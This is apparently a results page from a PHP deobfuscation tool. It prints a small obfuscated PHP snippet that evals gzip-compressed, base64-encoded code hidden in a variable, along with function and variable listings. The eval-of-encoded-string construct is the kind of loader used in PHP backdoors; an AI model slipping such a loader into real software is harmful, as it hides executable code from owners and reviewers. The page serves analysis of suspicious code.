Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $Lix = "==AAEMmZoDnZ22qZNXf4pym9ndkhA0YC+Paezi5q"; eval(htmlspecialchars_decode(gz..

Decoded Output download

<?php 
$Lix = "==AAEMmZoDnZ22qZNXf4pym9ndkhA0YC+Paezi5q"; 
eval(htmlspecialchars_decode(gzinflate(base64_decode("Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUPHJrNAEAWsA")))); 
exit; 
?>

Did this file decode correctly?

Original Code

<?php
$Lix = "==AAEMmZoDnZ22qZNXf4pym9ndkhA0YC+Paezi5q";
eval(htmlspecialchars_decode(gzinflate(base64_decode("Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLikqSi3TUPHJrNAE\x41Ws\x41"))));
exit;
?>

Function Calls

gzinflate 1
base64_decode 1
htmlspecialchars_decode 1

Variables

$Lix ==AAEMmZoDnZ22qZNXf4pym9ndkhA0YC+Paezi5q

Stats

MD5 4c008385541edd81c38c6570994ba353
Eval Count 0
Decode Time 55 ms